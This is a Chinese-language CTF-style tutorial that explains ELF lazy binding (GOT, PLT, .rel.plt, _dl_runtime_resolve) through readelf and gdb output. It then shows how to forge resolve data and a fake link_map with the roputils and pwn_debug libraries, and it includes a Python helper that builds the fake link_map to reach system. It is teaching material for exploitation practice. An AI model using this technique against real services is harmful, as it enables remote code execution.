Note
Search…
Return-to-dl-resolve原理及利用
About GOT and PLT
为了了解
GOT和PLT,首先要知道关于PIC的知识,Position Independent Code(PIC)是为了是为了重定位动态链接库的symbols,现代操作系统不允许修改代码段,只能修改数据段,而使用了动态链接库后函数地址只有在执行时才能确定,所以程序内调用的库中的函数地址在编译时不知道,所以,编译时将函数调用返回.data段,而包含PIC的程序在运行时需要更改.data段中的GOT和PLT来重定位全局变量。Global Offset Table,也就是GOT表为每个全局变量保存了入口地址,在调用全局变量时,会直接调用对应GOT表条目中保存的地址,而不调用绝对地址。Procedural Linkage Table,也就是PLT是过程链接表,为每个全局变量保存了一段代码,第一次调用一个函数会调用形如[email protected]的函数,这就是跳到了函数对应的PLT表开头执行,会解析出函数真正的地址填入GOT表中,以后调用时会从GOT表中取出函数真正的起始地址执行,下面给一张我自己做的调用流程图。
Environment
1
[email protected]:~/Desktop$ uname -a
2
Linux VirtualBox 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
3
4
[email protected]:~/Desktop$ lsb_release -a
5
No LSB modules are available.
6
Distributor ID: Ubuntu
7
Description: Ubuntu 12.04.5 LTS
8
Release: 12.04
9
Codename: precise
10
11
[email protected]:~/Desktop$ gcc -v
12
gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5)
Copied!
测试代码:
1
//test.c
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <string.h>
5
6
int main() {
7
8
printf("aaa");
9
char* s = (char *)malloc(300);
10
char* s1 = (char*)malloc(248);
11
void* a = malloc(0x20);
12
free(a);
13
free(s);
14
free(s1);
15
malloc(100);
16
malloc(200);
17
return 0;
18
}
Copied!
编译链接:
1
[email protected]:~/Desktop$ gcc -g test.c -o test
Copied!
Something about .dynamic
ELF的
.dynamic section里包含了和重定位有关的很多信息,完整的.dynamic段:1
[email protected]:~/Desktop$ readelf -d test
2
3
Dynamic section at offset 0xf28 contains 20 entries:
4
Tag Type Name/Value
5
0x00000001 (NEEDED) Shared library: [libc.so.6]
6
0x0000000c (INIT) 0x80482f4
7
0x0000000d (FINI) 0x804857c
8
0x6ffffef5 (GNU_HASH) 0x80481ac
9
0x00000005 (STRTAB) 0x804823c
10
0x00000006 (SYMTAB) 0x80481cc
11
0x0000000a (STRSZ) 88 (bytes)
12
0x0000000b (SYMENT) 16 (bytes)
13
0x00000015 (DEBUG) 0x0
14
0x00000003 (PLTGOT) 0x8049ff4
15
0x00000002 (PLTRELSZ) 40 (bytes)
16
0x00000014 (PLTREL) REL
17
0x00000017 (JMPREL) 0x80482cc
18
0x00000011 (REL) 0x80482c4
19
0x00000012 (RELSZ) 8 (bytes)
20
0x00000013 (RELENT) 8 (bytes)
21
0x6ffffffe (VERNEED) 0x80482a4
22
0x6fffffff (VERNEEDNUM) 1
23
0x6ffffff0 (VERSYM) 0x8048294
24
0x00000000 (NULL) 0x0
Copied!
GOT表分成两部分.got和.got.plt,前一个保存全局变量引用位置,后一个保存函数引用位置,通常说的GOT指后面一个,下文GOT即代表.got.plt。GOT表的起始地址:1
[email protected]:~/Desktop$ readelf -d test | grep GOT
2
0x00000003 (PLTGOT) 0x8049ff4
Copied!
GOT表的前三项有特殊含义:1
gdb-peda$ x/3x 0x8049ff4
2
0x8049ff4 <_GLOBAL_OFFSET_TABLE_>: 0x08049f28 0xb7fff918 0xb7ff2650
3
gdb-peda$ x/i 0xb7ff2650
4
0xb7ff2650 <_dl_runtime_resolve>: push eax
5
gdb-peda$ x/x 0x08049f28
6
0x8049f28 <_DYNAMIC>: 0x00000001
7
gdb-peda$ x/x 0xb7fff918
8
0xb7fff918: 0x00000000
Copied!
第一项是
.dynamic段的地址,第二个是link_map的地址,第三个是_dl_runtime_resolve函数的地址,第四项开始就是函数的GOT表了,第一项就是printf条目:1
gdb-peda$ x/x 0x8049ff4+0xc
2
0x804a000 <[email protected].plt>: 0x08048346
Copied!
PLTRELSZ指定了.rel.plt大小,RELENT指定每一项大小,PLTREL指定条目类型为REL,JMPREL对应.rel.plt地址,保存了重定位表,保存的是结构体信息:1
[email protected]:~/Desktop$ readelf -d test | grep REL
2
0x00000002 (PLTRELSZ) 40 (bytes)
3
0x00000014 (PLTREL) REL
4
0x00000017 (JMPREL) 0x80482cc
5
0x00000011 (REL) 0x80482c4
6
0x00000012 (RELSZ) 8 (bytes)
7
0x00000013 (RELENT) 8 (bytes)
Copied!
REL的数据结构为:1
typedef struct
2
{
3
Elf32_Addr r_offset; /* Address */
4
Elf32_Word r_info; /* Relocation type and symbol index */
5
} Elf32_Rel;
6
#define ELF32_R_SYM(val) ((val) >> 8)
7
#define ELF32_R_TYPE(val) ((val) & 0xff)
Copied!
r_offset就是对应函数GOT表地址,看看.rel.plt第一项和第二项:1
gdb-peda$ x/2x 0x80482cc
2
0x80482cc: 0x0804a000 0x00000107
3
gdb-peda$ x/2x 0x80482cc+0x8
4
0x80482d4: 0x0804a004 0x00000207
Copied!
再看:
1
[email protected]:~/Desktop$ readelf -r test
2
3
Relocation section '.rel.dyn' at offset 0x2c4 contains 1 entries:
4
Offset Info Type Sym.Value Sym. Name
5
08049ff0 00000406 R_386_GLOB_DAT 00000000 __gmon_start__
6
7
Relocation section '.rel.plt' at offset 0x2cc contains 5 entries:
8
Offset Info Type Sym.Value Sym. Name
9
0804a000 00000107 R_386_JUMP_SLOT 00000000 printf
10
0804a004 00000207 R_386_JUMP_SLOT 00000000 free
11
0804a008 00000307 R_386_JUMP_SLOT 00000000 malloc
12
0804a00c 00000407 R_386_JUMP_SLOT 00000000 __gmon_start__
13
0804a010 00000507 R_386_JUMP_SLOT 00000000 __libc_start_main
Copied!
分别和
printf与free对应,0x0804a000处就是printf的GOT表地址。根据宏定义,由
r_info=0x107可以知道ELF32_R_TYPE(r_info)=7,对应于R_386_JUMP_SLOT;其symbol index则为RLF32_R_SYM(r_info)=1还有一个需要注意的就是字符串表,保存了一些符号表,在重定位时会用到:
1
[email protected]:~/Desktop$ readelf -d test | grep STRTAB
2
0x00000005 (STRTAB) 0x804823c
Copied!
查看:
1
gdb-peda$ x/10s 0x804823c
2
0x804823c: ""
3
0x804823d: "__gmon_start__"
4
0x804824c: "libc.so.6"
5
0x8048256: "_IO_stdin_used"
6
0x8048265: "printf"
7
0x804826c: "malloc"
8
0x8048273: "__libc_start_main"
9
0x8048285: "free"
10
0x804828a: "GLIBC_2.0"
11
0x8048294: ""
Copied!
How ELF relocation works
在第一次
call 0x8048340 <[email protected]>时会跳到PLT段中,第一句会跳到GOT条目指向的地址:1
gdb-peda$ x/x 0x804a000
2
0x804a000 <[email protected].plt>: 0x08048346
3
gdb-peda$ b *0x08048346
4
Breakpoint 2 at 0x8048346
5
gdb-peda$ c
Copied!
第一次调用函数时,
GOT表中的地址为PLT表的第二句地址:1
0x8048340 <[email protected]>: jmp DWORD PTR ds:0x804a000
2
=> 0x8048346 <[email protected]+6>: push 0x0
3
0x804834b <[email protected]+11>: jmp 0x8048330
4
↓
5
=> 0x804834b <[email protected]+11>: jmp 0x8048330
6
| 0x8048350 <[email protected]>: jmp DWORD PTR ds:0x804a004
7
| 0x8048356 <[email protected]+6>: push 0x8
8
| 0x804835b <[email protected]+11>: jmp 0x8048330
9
| 0x8048360 <[email protected]>: jmp DWORD PTR ds:0x804a008
10
|-> 0x8048330: push DWORD PTR ds:0x8049ff8
11
0x8048336: jmp DWORD PTR ds:0x8049ffc
12
0x804833c: add BYTE PTR [eax],al
13
0x804833e: add BYTE PTR [eax],al
14
↓
15
=> 0x8048336: jmp DWORD PTR ds:0x8049ffc
16
| 0x804833c: add BYTE PTR [eax],al
17
| 0x804833e: add BYTE PTR [eax],al
18
| 0x8048340 <[email protected]>: jmp DWORD PTR ds:0x804a000
19
| 0x8048346 <[email protected]+6>: push 0x0
20
|-> 0xb7ff2650 <_dl_runtime_resolve>: push eax
Copied!
先push
reloc_offset,这里是0,再push link_map,也就是GOT表的第二项,再调用_dl_runtime_resolve函数。_dl_runtime_resolve根据reloc_offset找到.rel.plt段中的结构体:1
Elf32_Rel * p = JMPREL + rel_offset;
2
3
p的内容:
4
0x80482cc: 0x0804a000 0x00000107
Copied!
r_info为0x107。然后根据
ELF32_R_SYM(r_info)找到.dynsym中对应的结构体:1
Elf32_Sym *sym = SYMTAB[ELF32_R_SYM(p->r_info)]
2
=> sym = SYMTAB[1]
Copied!
.dynsym有关的信息为:1
[email protected]:~/Desktop$ readelf -d test | grep SYM
2
0x00000006 (SYMTAB) 0x80481cc
3
0x0000000b (SYMENT) 16 (bytes)
Copied!
其实地址为
0x80481cc,每个结构体大小为16bytes,结构体为:
1
typedef struct
2
{
3
Elf32_Word st_name; /* Symbol name (string tbl index) */
4
Elf32_Addr st_value; /* Symbol value */
5
Elf32_Word st_size; /* Symbol size */
6
unsigned char st_other; /* Symbol visibility */
7
Elf32_Section st_shndx; /* Section index */
8
} Elf32_Sym;
Copied!
所以
SYMTAB[1]为0x80481cc+16:1
gdb-peda$ x/5wx 0x80481cc+16
2
0x80481dc: 0x00000029 0x00000000 0x00000000 0x00000012
3
0x80481ec: 0x00000049
Copied!
然后根据
sym->st_name=0x29在.dynstr中,也就是STRTAB找到函数对应的字符串:1
gdb-peda$ x/s 0x804823c+0x29
2
0x8048265: "printf"
Copied!
根据函数名字找到对应的地址,填入
GOT表对应的位置,跳到函数起始地址执行,执行完后,printf对应的GOT表处已经填上了函数真正的地址:1
gdb-peda$ x/x 0x0804a000
2
0x804a000 <[email protected].plt>: 0xb7e6b8a0
Copied!
Python Libraries
可借用一些库来生成伪造的符号信息
- roputils
32位构造使用方法:
以前被人们使用频率最高的是roputils库,他的ROP里面的子方法
dl_resolve_data与dl_resolve_call,可以生成伪造符号信息与call时的reloc偏移使用方法:
1
import roputils
2
rop = roputils.ROP('./bianry')
3
dl_resolve_data = rop.dl_resolve_data(base_addr,call_name_str)
4
dl_resolve_call = rop.dl_resolve_call(dl_resolve_data_addr, arg_addr)
Copied!
dl_resolve_data有两个参数,base_addr它声明了生成的dl_resolve_data数据的地址,因为我们接下来就要想办法将生成的dl_resolve_data数据写入这个地址。call_name_str是你想要调用函数名的字符串。dl_resolve_call就是生成劫持地址plt[0],及reloc参数,和call参数一个plt_call_gadget,它的第一个参数是dl_resolve_data数据的地址,第二个参数是你想调用函数的参数的地址。缺陷:roputils库没能很好的设置
reloc->r_info,这会使得ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff偏大,在有些情况下会导致version = &l->l_versions[ndx]出现访存错误,下面介绍的pwndbg库解决了这个问题,它伪造的reloc->r_info,使得ndx为0,即vernum[reloc->r_info]为0。64位构造使用方法:
1
const struct r_found_version *version = NULL;
2
3
if (l->l_info[VERSYMIDX(DT_VERSYM)] != NULL) // [r10+0x1c8] != 0
4
{
5
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
6
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
7
version = &l->l_versions[ndx];
8
if (version->hash == 0)
9
version = NULL;
10
}
Copied!
由于64位程序的利用需要往link_map+0x1c8的位置写0,所以直接避免了了32位程序用roputils库构造的r_info缺陷。
构造的话和之前的脚本代码一样,roputils.ROP方法自动识别程序架构,唯一不同的是
dl_resolve_call函数的参数只有一个,没有调用函数的参数,因为调用函数的参数需要你用寄存器传递。早期有人说这种利用方法很鸡肋:“使得l->l_info[VERSYMIDX (DT_VERSYM)] != NULL这句话不成立来绕过该段代码,即使得l->l_info[VERSYMIDX (DT_VERSYM)]等于NULL,即使得(link_map + 0x1c8) 处为 NULL。这就使问题变成了往link_map写空值,由于link_map在ld.so中,还需要通过got表泄露其地址。因此实现64位的上述方法的ret2dl_resolve,需要泄露与地址写两个漏洞,如果有这两个漏洞我们应该可以使用更轻松的方法来get shell,因此价值不大。”
但是那些人忘了,在完全很冷门glibc的远程环境下,你能泄露地址你也不一定得出一些有用信息,你也猜不出函数偏移,所以我们只能利用这一种方式来getshell。
- pwn_debug
这是
raycp师傅根据pwntools写的一个库(此处膜拜),它不仅提供了32位完美的dl_resolve数据伪造,还提供了64位程序ret2dl_resolve攻击的link_map伪造。32位构造使用方法:
1
from pwn_debug import *
2
3
pdbg=pwn_debug("./binary")
4
pdbg.local()
5
p=pdbg.run("local")
6
7
dl=pdbg.ret2dl_resolve()
8
correct_addr,resolve_data,resovle_call=dl.build_normal_resolve( base_addr , call_name_str , resolve_target)
Copied!
下面解释一下,这个库好像必须调用run方法才能使用
ret2dl_resolve().....这里先不管能用就行......dl=pdbg.ret2dl_resolve()是初始化一个对象,可以去研究一下源码,功能是识别binary的架构。dl.build_normal_resolve( base_addr , call_name_str , resolve_target)关键是这串代码,第一个参数是一个base地址,build_normal_resolve方法根据这个地址微调,这是为了构造ndx=0,寻找正确的symbol_index,最后返回一个被修正后的correct_addr。它的返回值有三个,后两个都是构造好的数据。我们最后使用的时候,要将得到的
resolve_data数据写入到被修正后的correct_addr地址中,它返回的resovle_call是一个plt_call_gadget 但他不同于roputils生成的,因为他没有把参数封装进去,我们需要自己设置call的参数。另外
build_normal_resolve方法的第三个参数resolve_target是程序成功执行dl-resolve执行完我们想要call的函数后,这个地址会被写入 被执行函数的真实地址(虽然普通pwn下没什么用...)。可见使用这个库一切都变得controllable
64位构造使用方法:
在这之前先说说64位下的
dl_runtime_resolve利用,因为64位程序bss段的位置离符号信息段较远,构造的数据一般都是在bss段,如0x601000-0x602000,导致其相对于.dynsym的地址0x400000-0x401000很大,使得reloc->r_info也很大,最后使得访问ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;时程序访存出错,导致程序崩溃,且不可避免。1
if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
2
{
3
const struct r_found_version *version = NULL;
4
5
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
6
{
7
const ElfW(Half) *vernum =
8
(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
9
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
10
version = &l->l_versions[ndx];
11
if (version->hash == 0)
12
version = NULL;
13
}
Copied!
可以看到该段代码还有一个条件if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0),我们是否可构造sym->st_other使它不为空,从而绕过该段代码,我们看假设sym->st_other使它不为空,dl_fixup的代码流程:
1
_dl_fixup (struct link_map *l, ElfW(Word) reloc_arg)
2
{
3
4
//获取符号表地址
5
const ElfW(Sym) *const symtab= (const void *) D_PTR (l, l_info[DT_SYMTAB]);
6
//获取字符串表地址
7
const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);
8
//获取函数对应的重定位表结构地址
9
const PLTREL *const reloc = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
10
//获取函数对应的符号表结构地址
11
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
12
//得到函数对应的got地址,即真实函数地址要填回的地址
13
void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
14
15
DL_FIXUP_VALUE_TYPE value;
16
17
//判断重定位表的类型,必须要为7--ELF_MACHINE_JMP_SLOT
18
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
19
/* Look up the target symbol. If the normal lookup rules are not
20
used don't look in the global scope. */
21
22
23
if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
24
{
25
...
26
}
27
else
28
{
29
/* We already found the symbol. The module (and therefore its load
30
address) is also known. */
31
value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
32
result = l;
33
}
34
35
...
36
37
// 最后把value写入相应的GOT表条目rel_addr中
38
return elf_machine_fixup_plt (l, result, reloc, rel_addr, value);
39
}
Copied!
可以看到当sym->st_other不为0时,会调用DL_FIXUP_MAKE_VALUE,根据代码的注释,该代码认为这个符号已经解析过,直接调用DL_FIXUP_MAKE_VALUE函数赋值。DL_FIXUP_MAKE_VALUE函数的定义如下,直接将l->l_addr + sym->st_value赋值给value:
#define DL_FIXUP_MAKE_VALUE(map, addr) (addr)也可以看到sym等都是从link_map中取出来的,如果我们将控制的目标不设定为reloc_arg,而是伪造第一个参数link_map。如果我们可以控制sym->st_value指向got表中的地址如libc_start_main的got,而l->l_addr为目标地址如system到libc_start_main的偏移,则最终得到的value会是l->l_addr + sym->st_value即system地址,从而实现无需leak地址的利用,也可执行libc中的任意gadgets。
所以在利用中我们控制的不再是reloc_arg,而是struct link_map *l,假设我们可以覆盖got+4,即link_map的值,指向我们可控的目标。
下面就来说说利用的脚本了:
1
from pwn_debug import *
2
3
pdbg=pwn_debug("./binary64")
4
pdbg.local()
5
p=pdbg.run("local")
6
libc=ELF("libc.so.6")
7
elf=ELF("binary64")
8
9
offset=libc.symbols['system']-libc.symbols['__libc_start_main']
10
got_libc_address=elf.got['__libc_start_main']
11
dl=pdbg.ret2dl_resolve()
12
fake_link_map=dl.build_link_map(fake_addr,reloc_index,offset,got_libc_address)
Copied!
首先我们需要知道远程服务器glibc版本,没有的话也可以猜猜碰运气,然后算出我们想要执行的gadget距离
__libc_start_main的偏移,build_link_map方法的参数意思也很明显了,fake_addr是我们要基于这个位置生成fake_link_map数据,reloc_index是我们之后执行plt_call_gadget对应的reloc最后利用的时候,我们要将生成的
fake_link_map数据写入fake_addr地址处,还将要程序link_map_got表(got+4)中的link_map地址写成fake_addr地址,最后跳去plt表的push reloc指令地址处执行,之前要构造好参数,最后进入dl_runtime_resolve函数,根据link_map解析到调用函数,getshell.把pwn_debug里面的
fake_link_map功能函数抠出来,可单独使用,脚本如下:1
def build_link_map(fake_addr,reloc_index,offset,got_libc_address):
2
3
fake_link_map=p64(offset)
4
fake_link_map=fake_link_map.ljust(0x10,'\x00')
5
6
fake_link_map=fake_link_map.ljust(0x30,'\x00')
7
8
target_write=fake_addr+0x28
9
fake_jmprel=p64(target_write-offset) ## offset
10
fake_jmprel+=p64(7)
11
fake_jmprel+=p64(0)
12
fake_link_map+=fake_jmprel
13
14
fake_link_map=fake_link_map.ljust(0x68,'\x00')
15
fake_link_map+=p64(fake_addr) # DT_STRTAB
16
fake_link_map+=p64(fake_addr+0x78-8) #fake_DT_SYMTAB
17
fake_link_map+=p64(got_libc_address-8) # symtab_addr st->other==libc_address
18
fake_link_map+=p64(fake_addr+0x30-0x18*reloc_index)
19
fake_link_map=fake_link_map.ljust(0xf8,'\x00')
20
fake_link_map+=p64(fake_addr+0x80-8) #fake_DT_JMPREL
21
22
return fake_link_map
Copied!
Related Links
Last modified 10mo ago